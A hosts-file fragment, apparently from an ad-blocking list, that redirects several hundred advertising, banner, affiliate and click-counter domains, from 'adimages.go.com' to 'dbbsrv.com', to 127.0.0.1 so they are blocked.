127.0.0.1 adimages.go.com
127.0.0.1 adimages.homestore.com
127.0.0.1 adimages.sanomawsoy.fi
127.0.0.1 adimg.cnet.com
127.0.0.1 adimg.com.com
127.0.0.1 adimg1.chosun.com
127.0.0.1 adimgs.sapo.pt
127.0.0.1 adincl.gopher.com
127.0.0.1 adition.de
127.0.0.1 adition.net
127.0.0.1 adjuggler.yourdictionary.com
127.0.0.1 adlegend.com
127.0.0.1 adlink.de
127.0.0.1 adlog.com.com
127.0.0.1 adlogix.net
127.0.0.1 adm.ad.asap-asp.net
127.0.0.1 adman.freeze.com
127.0.0.1 admanagement.ch
127.0.0.1 admanager.beweb.com
127.0.0.1 admanager.btopenworld.com
127.0.0.1 admanager.carsoup.com
127.0.0.1 admanager.persianblog.com
127.0.0.1 admaximize.com
127.0.0.1 admedia.ro
127.0.0.1 admeta.com
127.0.0.1 admex.com
127.0.0.1 adminder.com
127.0.0.1 adminshop.com
127.0.0.1 admonitor.com
127.0.0.1 admonitor.net
127.0.0.1 admotion.com.ar
127.0.0.1 adnet.biz
127.0.0.1 adnews.maddog2000.de
127.0.0.1 ado.internet.cz
127.0.0.1 adorigin.com
127.0.0.1 adpepper.dk
127.0.0.1 adpick.switchboard.com
127.0.0.1 adprofile.net
127.0.0.1 adprojekt.pl
127.0.0.1 adpush.dreamscape.com
127.0.0.1 adq.nextag.com
127.0.0.1 adremedy.com
127.0.0.1 adremote.pathfinder.com
127.0.0.1 adrenaline.cz
127.0.0.1 adrenalinesk.sk
127.0.0.1 adreporting.com
127.0.0.1 adres.internet.com
127.0.0.1 adrevolver.com
127.0.0.1 adrevolver.holzmannverlag.de
127.0.0.1 adriver.ru
127.0.0.1 adroar.com
127.0.0.1 adrotate.de
127.0.0.1 adrotator.net
127.0.0.1 ads-205.quarterserver.de
127.0.0.1 ads-de.spray.net
127.0.0.1 ads.100asians.com
127.0.0.1 ads.5ci.lt
127.0.0.1 ads.aceweb.net
127.0.0.1 ads.adshareware.net
127.0.0.1 ads.adultfriendfinder.com
127.0.0.1 ads.advance.net
127.0.0.1 ads.adverline.com
127.0.0.1 ads.affiliates.match.com
127.0.0.1 ads.allsites.com
127.0.0.1 ads.alwayson-network.com
127.0.0.1 ads.amazingmedia.com
127.0.0.1 ads.amdmb.com
127.0.0.1 ads.aol.com
127.0.0.1 ads.as4x.tmcs.net
127.0.0.1 ads.asia1.com.sg
127.0.0.1 ads.asiafriendfinder.com
127.0.0.1 ads.aspalliance.com
127.0.0.1 ads.battle.net
127.0.0.1 ads.belointeractive.com
127.0.0.1 ads.berlinonline.de
127.0.0.1 ads.betanews.com
127.0.0.1 ads.bfast.com
127.0.0.1 ads.bigcitytools.com
127.0.0.1 ads.bigfoot.com
127.0.0.1 ads.billiton.de
127.0.0.1 ads.bitsonthewire.com
127.0.0.1 ads.blick.ch
127.0.0.1 ads.bloomberg.com
127.0.0.1 ads.bluemountain.com
127.0.0.1 ads.box.sk
127.0.0.1 ads.businessweek.com
127.0.0.1 ads.canalblog.com
127.0.0.1 ads.canoe.ca
127.0.0.1 ads.cavello.com
127.0.0.1 ads.cbc.ca
127.0.0.1 ads.cdfreaks.com
127.0.0.1 ads.centraliprom.com
127.0.0.1 ads.cgnetworks.com
127.0.0.1 ads.channel4.com
127.0.0.1 ads.cimedia.com
127.0.0.1 ads.clearchannel.com
127.0.0.1 ads.collegclub.com
127.0.0.1 ads.com.com
127.0.0.1 ads.currantbun.com
127.0.0.1 ads.cyberfight.ru
127.0.0.1 ads.cybersales.cz
127.0.0.1 ads.danworld.net
127.0.0.1 ads.datingyes.com
127.0.0.1 ads.dbforums.com
127.0.0.1 ads.ddj.com
127.0.0.1 ads.deltha.hu
127.0.0.1 ads.dennisnet.co.uk
127.0.0.1 ads.desmoinesregister.com
127.0.0.1 ads.detelefoongids.nl
127.0.0.1 ads.developershed.com
127.0.0.1 ads.deviantart.com
127.0.0.1 ads.digitalmedianet.com
127.0.0.1 ads.digitalpoint.com
127.0.0.1 ads.directionsmag.com
127.0.0.1 ads.discovery.com
127.0.0.1 ads.dk
127.0.0.1 ads.dmk-internet.com
127.0.0.1 ads.e-planning.net
127.0.0.1 ads.edbindex.dk
127.0.0.1 ads.einmedia.com
127.0.0.1 ads.erotism.com
127.0.0.1 ads.esmas.com
127.0.0.1 ads.eu.msn.com
127.0.0.1 ads.eudora.com
127.0.0.1 ads.exhedra.com
127.0.0.1 ads.ezboard.com
127.0.0.1 ads.fairfax.com.au
127.0.0.1 ads.filmup.com
127.0.0.1 ads.firingsquad.com
127.0.0.1 ads.flooble.com
127.0.0.1 ads.floridatoday.com
127.0.0.1 ads.fool.com
127.0.0.1 ads.forbes.com
127.0.0.1 ads.forbes.net
127.0.0.1 ads.forium.de
127.0.0.1 ads.fortunecity.com
127.0.0.1 ads.foxkidseurope.net
127.0.0.1 ads.freecity.de
127.0.0.1 ads.freeze.com
127.0.0.1 ads.friendtest.com
127.0.0.1 ads.ft.com
127.0.0.1 ads.g4techtv.com
127.0.0.1 ads.game.net
127.0.0.1 ads.gamecity.net
127.0.0.1 ads.gamecopyworld.no
127.0.0.1 ads.gameforgeads.de
127.0.0.1 ads.gamershell.com
127.0.0.1 ads.gamespy.com
127.0.0.1 ads.gamespyid.com
127.0.0.1 ads.gamigo.de
127.0.0.1 ads.gawker.com
127.0.0.1 ads.gettools.com
127.0.0.1 ads.globeandmail.com
127.0.0.1 ads.gotfrag.com
127.0.0.1 ads.goyk.com
127.0.0.1 ads.grindinggears.com
127.0.0.1 ads.guardian.co.uk
127.0.0.1 ads.guardianunlimited.co.uk
127.0.0.1 ads.hbv.de
127.0.0.1 ads.heartlight.org
127.0.0.1 ads.herald-sun.com
127.0.0.1 ads.hollywood.com
127.0.0.1 ads.humorbua.no
127.0.0.1 ads.iafrica.com
127.0.0.1 ads.iboost.com
127.0.0.1 ads.icq.com
127.0.0.1 ads.ign.com
127.0.0.1 ads.imdb.com
127.0.0.1 ads.img.co.za
127.0.0.1 ads.indya.com
127.0.0.1 ads.indystar.com
127.0.0.1 ads.inetfast.com
127.0.0.1 ads.inetinteractive.com
127.0.0.1 ads.infi.net
127.0.0.1 ads.infospace.com
127.0.0.1 ads.internic.co.il
127.0.0.1 ads.inthemix.com.au
127.0.0.1 ads.ipowerweb.com
127.0.0.1 ads.isoftmarketing.com
127.0.0.1 ads.itv.com
127.0.0.1 ads.iwon.com
127.0.0.1 ads.jimworld.com
127.0.0.1 ads.jpost.com
127.0.0.1 ads.jubii.dk
127.0.0.1 ads.katz.ws
127.0.0.1 ads.kinobox.cz
127.0.0.1 ads.krawall.de
127.0.0.1 ads.leo.org
127.0.0.1 ads.linuxjournal.com
127.0.0.1 ads.linuxquestions.org
127.0.0.1 ads.linuxsecurity.com
127.0.0.1 ads.lnkworld.com
127.0.0.1 ads.localnow.com
127.0.0.1 ads.lycos-europe.com
127.0.0.1 ads.lycos.com
127.0.0.1 ads.madison.com
127.0.0.1 ads.mariuana.it
127.0.0.1 ads.mcafee.com
127.0.0.1 ads.mediaodyssey.com
127.0.0.1 ads.mediaturf.net
127.0.0.1 ads.metropol.dk
127.0.0.1 ads.mgnetwork.com
127.0.0.1 ads.monster.com
127.0.0.1 ads.msn.com
127.0.0.1 ads.multimania.lycos.fr
127.0.0.1 ads.musiccity.com
127.0.0.1 ads.myguysolutions.com
127.0.0.1 ads.mysimon.com
127.0.0.1 ads.nandomedia.com
127.0.0.1 ads.nationalreview.com
127.0.0.1 ads.neoseeker.com
127.0.0.1 ads.neowin.net
127.0.0.1 ads.netmechanic.com
127.0.0.1 ads.newcity.com
127.0.0.1 ads.newcitynet.com
127.0.0.1 ads.newdream.net
127.0.0.1 ads.newmedia.cz
127.0.0.1 ads.newsint.co.uk
127.0.0.1 ads.newsobserver.com
127.0.0.1 ads.newsquest.co.uk
127.0.0.1 ads.newtimes.com
127.0.0.1 ads.ngenuity.com
127.0.0.1 ads.ninemsn.com.au
127.0.0.1 ads.nola.com
127.0.0.1 ads.nordichardware.se
127.0.0.1 ads.ntadvice.com
127.0.0.1 ads.nwsource.com
127.0.0.1 ads.nyi.net
127.0.0.1 ads.nyjournalnews.com
127.0.0.1 ads.nypost.com
127.0.0.1 ads.nytimes.com
127.0.0.1 ads.nzcity.co.nz
127.0.0.1 ads.ole.com
127.0.0.1 ads.oneplace.com
127.0.0.1 ads.onlineguiden.com
127.0.0.1 ads.optusnet.com.au
127.0.0.1 ads.orsm.net
127.0.0.1 ads.osdn.com
127.0.0.1 ads.osnews.com
127.0.0.1 ads.ourbrisbane.com
127.0.0.1 ads.overclockers.at
127.0.0.1 ads.pcper.com
127.0.0.1 ads.peel.com
127.0.0.1 ads.phparena.net
127.0.0.1 ads.phpclasses.org
127.0.0.1 ads.pittsburghlive.com
127.0.0.1 ads.planet.nl
127.0.0.1 ads.pni.com
127.0.0.1 ads.powweb.com
127.0.0.1 ads.premiumnetwork.com
127.0.0.1 ads.primeinteractive.net
127.0.0.1 ads.prisacom.com
127.0.0.1 ads.pro-market.net
127.0.0.1 ads.realcities.com
127.0.0.1 ads.realmedia.de
127.0.0.1 ads.recoletos.es
127.0.0.1 ads.rediff.com
127.0.0.1 ads.rivals.net
127.0.0.1 ads.rottentomatoes.com
127.0.0.1 ads.rp-online.de
127.0.0.1 ads.rpgdot.com
127.0.0.1 ads.rpgui.com
127.0.0.1 ads.satyamonline.com
127.0.0.1 ads.savannahnow.com
127.0.0.1 ads.scifi.com
127.0.0.1 ads.sexplanets.com
127.0.0.1 ads.shareprovider.com
127.0.0.1 ads.sify.com
127.0.0.1 ads.simtel.net
127.0.0.1 ads.smartclick.com
127.0.0.1 ads.softwareoutfit.com
127.0.0.1 ads.space.com
127.0.0.1 ads.sptimes.com
127.0.0.1 ads.stationplay.com
127.0.0.1 ads.stileproject.com
127.0.0.1 ads.storagereview.net
127.0.0.1 ads.stratics.com
127.0.0.1 ads.switchboard.com
127.0.0.1 ads.techtv.com
127.0.0.1 ads.telegraaf.nl
127.0.0.1 ads.telegraph.co.uk
127.0.0.1 ads.theglobeandmail.com
127.0.0.1 ads.thestar.com
127.0.0.1 ads.thewebfreaks.com
127.0.0.1 ads.thottbot.com
127.0.0.1 ads.tiscali.fr
127.0.0.1 ads.tmcs.net
127.0.0.1 ads.top500.org
127.0.0.1 ads.townhall.com
127.0.0.1 ads.tripod.com
127.0.0.1 ads.tripod.lycos.co.uk
127.0.0.1 ads.tripod.lycos.de
127.0.0.1 ads.tripod.lycos.nl
127.0.0.1 ads.tucows.com
127.0.0.1 ads.ucomics.com
127.0.0.1 ads.uigc.net
127.0.0.1 ads.unixathome.org
127.0.0.1 ads.urli.net
127.0.0.1 ads.usatoday.com
127.0.0.1 ads.v3.com
127.0.0.1 ads.v3exchange.com
127.0.0.1 ads.vesperexchange.com
127.0.0.1 ads.videoaxs.com
127.0.0.1 ads.virtual-nights.com
127.0.0.1 ads.virtualcountries.com
127.0.0.1 ads.vnuemedia.com
127.0.0.1 ads.vnumedia.com
127.0.0.1 ads.wanadooregie.com
127.0.0.1 ads.weather.ca
127.0.0.1 ads.weather.com
127.0.0.1 ads.web.aol.com
127.0.0.1 ads.web.cs.com
127.0.0.1 ads.web.de
127.0.0.1 ads.web21.com
127.0.0.1 ads.webattack.com
127.0.0.1 ads.webheat.com
127.0.0.1 ads.webnet.advance.net
127.0.0.1 ads.whi.co.nz
127.0.0.1 ads.winsite.com
127.0.0.1 ads.wunderground.com
127.0.0.1 ads.x10.com
127.0.0.1 ads.x10.net
127.0.0.1 ads.xtra.co.nz
127.0.0.1 ads.yourfreedvds.com
127.0.0.1 ads.zdnet.com
127.0.0.1 ads001.webwombat.com.au
127.0.0.1 ads1.advance.net
127.0.0.1 ads1.akkuna.com
127.0.0.1 ads1.canoe.ca
127.0.0.1 ads1.erotism.com
127.0.0.1 ads1.mediacapital.pt
127.0.0.1 ads1.sptimes.com
127.0.0.1 ads1.theglobeandmail.com
127.0.0.1 ads10.speedbit.com
127.0.0.1 ads2.advance.net
127.0.0.1 ads2.akkuna.com
127.0.0.1 ads2.clearchannel.com
127.0.0.1 ads2.collegclub.com
127.0.0.1 ads2.collegeclub.com
127.0.0.1 ads2.exhedra.com
127.0.0.1 ads2.firingsquad.com
127.0.0.1 ads2.gamecity.net
127.0.0.1 ads2.jubii.dk
127.0.0.1 ads2.oneplace.com
127.0.0.1 ads2.osdn.com
127.0.0.1 ads2.top500.org
127.0.0.1 ads3.advance.net
127.0.0.1 ads3.gamecity.net
127.0.0.1 ads360.com
127.0.0.1 ads4.advance.net
127.0.0.1 ads4.clearchannel.com
127.0.0.1 ads4.gamecity.net
127.0.0.1 ads4.realcities.com
127.0.0.1 ads4homes.com
127.0.0.1 ads5.advance.net
127.0.0.1 ads5.canoe.ca
127.0.0.1 ads6.advance.net
127.0.0.1 ads6.gamecity.net
127.0.0.1 ads7.gamecity.net
127.0.0.1 ads8.com
127.0.0.1 adsag.com
127.0.0.1 Adsatt.ABCNews.starwave.com
127.0.0.1 adsatt.espn.go.com
127.0.0.1 adsatt.espn.starwave.com
127.0.0.1 Adsatt.go.starwave.com
127.0.0.1 adscholar.com
127.0.0.1 adscpm.com
127.0.0.1 adsdaq.com
127.0.0.1 adserv.aip.org
127.0.0.1 adserv.gamezone.de
127.0.0.1 adserv.geocomm.com
127.0.0.1 adserv.happypuppy.com
127.0.0.1 adserv.iafrica.com
127.0.0.1 adserv.lwmn.net
127.0.0.1 adserv.quality-channel.de
127.0.0.1 adserv1.winboard.org
127.0.0.1 adserve.viaarena.com
127.0.0.1 adserver.71i.de
127.0.0.1 adserver.adultfriendfinder.com
127.0.0.1 adserver.allerinternett.com
127.0.0.1 adserver.anm.co.uk
127.0.0.1 adserver.ath.cx
127.0.0.1 adserver.billiger-surfen.de
127.0.0.1 adserver.billiger-telefonieren.de
127.0.0.1 adserver.bluewin.ch
127.0.0.1 adserver.colleges.com
127.0.0.1 adserver.com
127.0.0.1 adserver.conjelco.com
127.0.0.1 adserver.developersnetwork.com
127.0.0.1 adserver.digitoday.com
127.0.0.1 adserver.dotcommedia.de
127.0.0.1 adserver.eudora.com
127.0.0.1 adserver.filefront.com
127.0.0.1 adserver.freecity.de
127.0.0.1 adserver.freenet.de
127.0.0.1 adserver.friendfinder.com
127.0.0.1 adserver.gamesquad.net
127.0.0.1 adserver.garden.com
127.0.0.1 adserver.geizkragen.de
127.0.0.1 adserver.gr
127.0.0.1 adserver.hardwareanalysis.com
127.0.0.1 adserver.hispavista.com
127.0.0.1 adserver.humanux.com
127.0.0.1 adserver.ign.com
127.0.0.1 adserver.isonews.com
127.0.0.1 adserver.itsfogo.com
127.0.0.1 adserver.janes.com
127.0.0.1 adserver.jolt.co.uk
127.0.0.1 adserver.journalinteractive.com
127.0.0.1 adserver.legacy-network.com
127.0.0.1 adserver.libero.it
127.0.0.1 adserver.m2kcore.com
127.0.0.1 adserver.monster.com
127.0.0.1 adserver.news.com.au
127.0.0.1 adserver.ngz-network.de
127.0.0.1 adserver.nydailynews.com
127.0.0.1 adserver.nzoom.com
127.0.0.1 adserver.pl
127.0.0.1 adserver.plhb.com
127.0.0.1 adserver.portalofevil.com
127.0.0.1 adserver.portugalmail.net
127.0.0.1 adserver.portugalmail.pt
127.0.0.1 adserver.ro
127.0.0.1 adserver.sanomawsoy.fi
127.0.0.1 adserver.securityfocus.com
127.0.0.1 adserver.sharewareonline.com
127.0.0.1 adserver.snowball.com
127.0.0.1 adserver.startnow.com
127.0.0.1 adserver.terra.es
127.0.0.1 adserver.theonering.net
127.0.0.1 adserver.track-star.com
127.0.0.1 adserver.trb.com
127.0.0.1 adserver.tribuneinteractive.com
127.0.0.1 adserver.ugo.com
127.0.0.1 adserver.usermagnet.com
127.0.0.1 adserver.visions.de
127.0.0.1 adserver.webhostlist.de
127.0.0.1 adserver.yahoo.com
127.0.0.1 adserver1-images.backbeatmedia.com
127.0.0.1 adserver1.backbeatmedia.com
127.0.0.1 adserver1.mediainsight.de
127.0.0.1 adserver1.ogilvy-interactive.de
127.0.0.1 adserver1.shareconnector.com
127.0.0.1 adserver2.mediainsight.de
127.0.0.1 adserver2.popdata.de
127.0.0.1 adserver3.eudora.com
127.0.0.1 adserver4.eudora.com
127.0.0.1 adserversolutions.com
127.0.0.1 adservervv.geizkragen.de
127.0.0.1 adserving.eleven-agency.com
127.0.0.1 adservingcentral.com
127.0.0.1 adsfac.net
127.0.0.1 adshadow.net
127.0.0.1 adsmart.co.uk
127.0.0.1 adsmart.com
127.0.0.1 adsmart.net
127.0.0.1 adsmusic.com
127.0.0.1 adsnew.userfriendly.org
127.0.0.1 adsoftware.com
127.0.0.1 adsoldier.com
127.0.0.1 adsp.ilse.nl
127.0.0.1 adspace.ro
127.0.0.1 adsremote.scripps.com
127.0.0.1 adsrv.iol.co.za
127.0.0.1 adsweb.tiscali.cz
127.0.0.1 adsynergy.com
127.0.0.1 adsystem.tt-forums.net
127.0.0.1 adtech.de
127.0.0.1 adtech.m7z.net
127.0.0.1 adtoma.com
127.0.0.1 adtrade.net
127.0.0.1 adtrading.de
127.0.0.1 adtrak.net
127.0.0.1 adtrix.com
127.0.0.1 adv-banner.libero.it
127.0.0.1 adv.for-ua.com
127.0.0.1 adv.freeonline.it
127.0.0.1 adv.hwupgrade.it
127.0.0.1 adv.isdn.cz
127.0.0.1 adv.surinter.net
127.0.0.1 adv.webmd.com
127.0.0.1 adv.wp.pl
127.0.0.1 adv.yo.cz
127.0.0.1 adv1.videoprofessor.com
127.0.0.1 advariant.com
127.0.0.1 adventory.com
127.0.0.1 adverity.com
127.0.0.1 adverserve.net
127.0.0.1 advert.bayarea.com
127.0.0.1 advert.hi-media.com
127.0.0.1 advert.hu
127.0.0.1 adverticum.com
127.0.0.1 adverticum.net
127.0.0.1 advertiseireland.com
127.0.0.1 advertising.com
127.0.0.1 advertising.se
127.0.0.1 advertisingbanners.com
127.0.0.1 advertmarket.com
127.0.0.1 advertmedia.de
127.0.0.1 advertpro.sitepoint.com
127.0.0.1 adverts.carltononline.com
127.0.0.1 advertserve.com
127.0.0.1 advertwizard.com
127.0.0.1 adview.ppro.de
127.0.0.1 adviva.net
127.0.0.1 advlab.it
127.0.0.1 advnt.com
127.0.0.1 advnt01.com
127.0.0.1 advnt02.com
127.0.0.1 advnt03.com
127.0.0.1 advnt04.com
127.0.0.1 advspot.com
127.0.0.1 adware.hu
127.0.0.1 adwealth.com
127.0.0.1 adweb.integctr.com
127.0.0.1 adworldnetwork.com
127.0.0.1 adworx.at
127.0.0.1 adx.allstar.cz
127.0.0.1 adx.arip.co.th
127.0.0.1 adx.atnext.com
127.0.0.1 adx.nu
127.0.0.1 ady.arip.co.th
127.0.0.1 adz.afterdawn.net
127.0.0.1 affiliate.1800flowers.com
127.0.0.1 affiliate.7host.com
127.0.0.1 affiliate.cfdebt.com
127.0.0.1 affiliate.doubleyourdating.com
127.0.0.1 affiliate.dtiserv.com
127.0.0.1 affiliate.gamestop.com
127.0.0.1 affiliate.grasscity.com
127.0.0.1 affiliate.travelnow.com
127.0.0.1 affiliate.viator.com
127.0.0.1 affiliatefuel.com
127.0.0.1 affiliates.allposters.com
127.0.0.1 affiliates.internationaljock.com
127.0.0.1 affiliatetracking.net
127.0.0.1 affiliplus.de
127.0.0.1 afiliados.submarino.com.br
127.0.0.1 ah-ha.com
127.0.0.1 aim4media.com
127.0.0.1 alladvantage.com
127.0.0.1 amedia.techies.com
127.0.0.1 app.lstdesign.com
127.0.0.1 arc1.msn.com
127.0.0.1 as.cmpnet.com
127.0.0.1 as.fotexnet.hu
127.0.0.1 as1.falkag.de
127.0.0.1 as2.falkag.de
127.0.0.1 as3.falkag.de
127.0.0.1 as4.falkag.de
127.0.0.1 as5000.com
127.0.0.1 asv.gameplanet.co.nz
127.0.0.1 atdmt.com
127.0.0.1 atwola.com
127.0.0.1 audit.median.hu
127.0.0.1 audit.webinform.hu
127.0.0.1 autohits.dk
127.0.0.1 avatarresources.com
127.0.0.1 avenuea.com
127.0.0.1 avres.net
127.0.0.1 awarez.net
127.0.0.1 awrz.net
127.0.0.1 azjmp.com
127.0.0.1 azoogleads.com
127.0.0.1 babs.tv2.dk
127.0.0.1 backbeatmedia.com
127.0.0.1 banerovec.cz
127.0.0.1 banex.cz
127.0.0.1 banik.redigy.cz
127.0.0.1 banman.cz
127.0.0.1 banner.ad.nu
127.0.0.1 banner.buempliz-online.ch
127.0.0.1 banner.casino.net
127.0.0.1 banner.casinodelrio.com
127.0.0.1 banner.coza.com
127.0.0.1 banner.cz
127.0.0.1 banner.easyspace.com
127.0.0.1 banner.elisa.net
127.0.0.1 banner.getgo.de
127.0.0.1 banner.img.co.za
127.0.0.1 banner.inyourpocket.com
127.0.0.1 banner.jobsahead.com
127.0.0.1 banner.kiev.ua
127.0.0.1 banner.linux.se
127.0.0.1 banner.media-system.de
127.0.0.1 banner.mindshare.de
127.0.0.1 banner.musikmedia.de
127.0.0.1 banner.nixnet.cz
127.0.0.1 banner.noblepoker.com
127.0.0.1 banner.northsky.com
127.0.0.1 banner.orb.net
127.0.0.1 banner.penguin.cz
127.0.0.1 banner.relcom.ru
127.0.0.1 banner.rojakpot.com
127.0.0.1 banner.t-online.de
127.0.0.1 banner.tanto.de
127.0.0.1 banner.tpage.com
127.0.0.1 banner.webmersion.com
127.0.0.1 banner4all.dk
127.0.0.1 bannerads.de
127.0.0.1 bannerads.zwire.com
127.0.0.1 bannerbank.ru
127.0.0.1 bannerbox.hu
127.0.0.1 bannerboxes.com
127.0.0.1 bannercommunity.de
127.0.0.1 bannerexchange.cjb.net
127.0.0.1 bannerhost.com
127.0.0.1 bannerhosts.com
127.0.0.1 bannerimage.com
127.0.0.1 bannerlandia.com.ar
127.0.0.1 bannermall.com
127.0.0.1 bannermarkt.nl
127.0.0.1 bannerpower.com
127.0.0.1 banners.adultfriendfinder.com
127.0.0.1 banners.amigos.com
127.0.0.1 banners.arachne.cz
127.0.0.1 banners.asiafriendfinder.com
127.0.0.1 banners.babylon-x.com
127.0.0.1 banners.babylonbucks.com
127.0.0.1 banners.bol.com.br
127.0.0.1 banners.clubseventeen.com
127.0.0.1 banners.czi.cz
127.0.0.1 banners.de.clara.net
127.0.0.1 banners.directnic.com
127.0.0.1 banners.dot.tk
127.0.0.1 banners.easydns.com
127.0.0.1 banners.ebay.com
127.0.0.1 banners.freett.com
127.0.0.1 banners.friendfinder.com
127.0.0.1 banners.friendsfinder.com
127.0.0.1 banners.hetnet.nl
127.0.0.1 banners.internetsexprovider.com
127.0.0.1 banners.iq.pl
127.0.0.1 banners.isoftmarketing.com
127.0.0.1 banners.kfmb.com
127.0.0.1 banners.lifeserv.com
127.0.0.1 banners.linkbuddies.com
127.0.0.1 banners.netcraft.com
127.0.0.1 banners.one2one.com
127.0.0.1 banners.resultonline.com
127.0.0.1 banners.sexsearch.com
127.0.0.1 banners.tucson.com
127.0.0.1 banners.uk.clara.net
127.0.0.1 banners.wunderground.com
127.0.0.1 bannerserver.com
127.0.0.1 bannerserver.gator.com
127.0.0.1 bannersgomlm.com
127.0.0.1 bannersng.yell.com
127.0.0.1 bannerspace.com
127.0.0.1 bannerswap.com
127.0.0.1 bannertesting.com
127.0.0.1 bannieres.acces-contenu.com
127.0.0.1 bans.bride.ru
127.0.0.1 bansrv1.n1media.com
127.0.0.1 barnesandnoble.bfast.com
127.0.0.1 bbmedia.cz
127.0.0.1 bbn.img.com.ua
127.0.0.1 bestsearch.net
127.0.0.1 bidclix.com
127.0.0.1 bidclix.net
127.0.0.1 bigads.guj.de
127.0.0.1 bigbangmedia.com
127.0.0.1 billboard.cz
127.0.0.1 bizad.nikkeibp.co.jp
127.0.0.1 bizban.net
127.0.0.1 blast4traffic.com
127.0.0.1 blazefind.com
127.0.0.1 blogads.com
127.0.0.1 bluehavenmedia.com
127.0.0.1 bluestreak.com
127.0.0.1 bm.annonce.cz
127.0.0.1 bn.bfast.com
127.0.0.1 bnr.volgocity.ru
127.0.0.1 boom.ro
127.0.0.1 bpath.com
127.0.0.1 bravenet.com
127.0.0.1 bridgetrack.com
127.0.0.1 british-banners.com
127.0.0.1 bs.yandex.ru
127.0.0.1 bs001.gmx.net
127.0.0.1 bs002.gmx.net
127.0.0.1 bs003.gmx.net
127.0.0.1 bs004.gmx.net
127.0.0.1 bs005.gmx.net
127.0.0.1 bs006.gmx.net
127.0.0.1 bs007.gmx.net
127.0.0.1 bs008.gmx.net
127.0.0.1 bs009.gmx.net
127.0.0.1 bs010.gmx.net
127.0.0.1 bs011.gmx.net
127.0.0.1 bs012.gmx.net
127.0.0.1 bs013.gmx.net
127.0.0.1 bs014.gmx.net
127.0.0.1 bs015.gmx.net
127.0.0.1 bs016.gmx.net
127.0.0.1 bs017.gmx.net
127.0.0.1 bs018.gmx.net
127.0.0.1 bs019.gmx.net
127.0.0.1 bs020.gmx.net
127.0.0.1 bs021.gmx.net
127.0.0.1 bs022.gmx.net
127.0.0.1 bs023.gmx.net
127.0.0.1 bs024.gmx.net
127.0.0.1 bs025.gmx.net
127.0.0.1 bs026.gmx.net
127.0.0.1 bs027.gmx.net
127.0.0.1 bs028.gmx.net
127.0.0.1 bs029.gmx.net
127.0.0.1 bs030.gmx.net
127.0.0.1 bs031.gmx.net
127.0.0.1 bs032.gmx.net
127.0.0.1 bs033.gmx.net
127.0.0.1 bs034.gmx.net
127.0.0.1 bs035.gmx.net
127.0.0.1 bs036.gmx.net
127.0.0.1 bs037.gmx.net
127.0.0.1 bs038.gmx.net
127.0.0.1 bs039.gmx.net
127.0.0.1 bs040.gmx.net
127.0.0.1 bs041.gmx.net
127.0.0.1 bs042.gmx.net
127.0.0.1 bs043.gmx.net
127.0.0.1 bs044.gmx.net
127.0.0.1 bs045.gmx.net
127.0.0.1 bs046.gmx.net
127.0.0.1 bs047.gmx.net
127.0.0.1 bs048.gmx.net
127.0.0.1 bs049.gmx.net
127.0.0.1 budsinc.com
127.0.0.1 burstnet.akadns.net
127.0.0.1 burstnet.com
127.0.0.1 businessfactory.prospero.com
127.0.0.1 c.bigmir.net
127.0.0.1 c1.nowlinux.com
127.0.0.1 candidclicks.com
127.0.0.1 casalemedia.com
127.0.0.1 casalmedia.com
127.0.0.1 cash4banner.com
127.0.0.1 cash4banner.de
127.0.0.1 cash4popup.de
127.0.0.1 cashfiesta.com
127.0.0.1 cashpartner.com
127.0.0.1 cashpartner.net
127.0.0.1 casinogames.com
127.0.0.1 casinorewards.com
127.0.0.1 casinotraffic.com
127.0.0.1 casinotreasure.com
127.0.0.1 cat.clx.ru
127.0.0.1 cben1.net
127.0.0.1 cbx.net
127.0.0.1 cdn2.adsdk.com
127.0.0.1 centrport.net
127.0.0.1 cgicounter.puretec.de
127.0.0.1 ch.questionmarket.com
127.0.0.1 chart.dk
127.0.0.1 checkm8.com
127.0.0.1 chestionar.ro
127.0.0.1 ciaoclick.com
127.0.0.1 cibleclick.com
127.0.0.1 cityads.telus.net
127.0.0.1 cj.com
127.0.0.1 cjbmanagement.com
127.0.0.1 claria.com
127.0.0.1 click-fr.com
127.0.0.1 click.absoluteagency.com
127.0.0.1 click.fool.co.uk
127.0.0.1 click.fool.com
127.0.0.1 click.go2net.com
127.0.0.1 click2freemoney.com
127.0.0.1 click2paid.com
127.0.0.1 click4click.com
127.0.0.1 clickability.com
127.0.0.1 clickagents.com
127.0.0.1 clickbank.com
127.0.0.1 clickbank.net
127.0.0.1 clickbroker.com
127.0.0.1 clickbrokers.com
127.0.0.1 clickcash.webpower.com
127.0.0.1 clickedyclick.com
127.0.0.1 clickfinders.com
127.0.0.1 clickforwebmasters.com
127.0.0.1 clickhere.foronlinegames.com
127.0.0.1 clickhereforcellphones.com
127.0.0.1 clickhouse.com
127.0.0.1 clickhype.com
127.0.0.1 clickmedia.ro
127.0.0.1 clicks.equantum.com
127.0.0.1 clicks.jackpot.com
127.0.0.1 clicks.mods.de
127.0.0.1 clicks.stripsaver.com
127.0.0.1 clickserve.cc-dt.com
127.0.0.1 clicksor.com
127.0.0.1 clickthrutraffic.com
127.0.0.1 clicktracks.com
127.0.0.1 clicktrade.com
127.0.0.1 clickxchange.com
127.0.0.1 clickz.com
127.0.0.1 clictrafic.com
127.0.0.1 clients.tbo.com
127.0.0.1 clixgalore.com
127.0.0.1 cnt.one.ru
127.0.0.1 cnt1.pocitadlo.cz
127.0.0.1 code-server.biz
127.0.0.1 colonize.com
127.0.0.1 comclick.com
127.0.0.1 commission-junction.com
127.0.0.1 commissionmonster.com
127.0.0.1 commonname.com
127.0.0.1 compactbanner.com
127.0.0.1 comprabanner.it
127.0.0.1 contextclick.com
127.0.0.1 cookies.cmpnet.com
127.0.0.1 cornflakes.pathfinder.com
127.0.0.1 count.rin.ru
127.0.0.1 counted.com
127.0.0.1 counter.bloke.com
127.0.0.1 counter.cnw.cz
127.0.0.1 counter.cz
127.0.0.1 counter.nowlinux.com
127.0.0.1 counter.rambler.ru
127.0.0.1 counter.search.bg
127.0.0.1 counter.times.lv
127.0.0.1 counter.webtrends.net
127.0.0.1 counter.yadro.ru
127.0.0.1 counters.honesty.com
127.0.0.1 counts.tucows.com
127.0.0.1 coupling-media.de
127.0.0.1 crazypopups.com
127.0.0.1 creative.whi.co.nz
127.0.0.1 creatives.as4x.tmcs.net
127.0.0.1 cserver.mii.instacontent.net
127.0.0.1 ctnetwork.hu
127.0.0.1 ctxtads.overture.com
127.0.0.1 custom-click.com
127.0.0.1 customad.cnn.com
127.0.0.1 cyberbounty.com
127.0.0.1 cybercount.com
127.0.0.1 cybereps.com
127.0.0.1 cybermonitor.com
127.0.0.1 cydoor.com
127.0.0.1 datingadvertising.com
127.0.0.1 dbbsrv.com
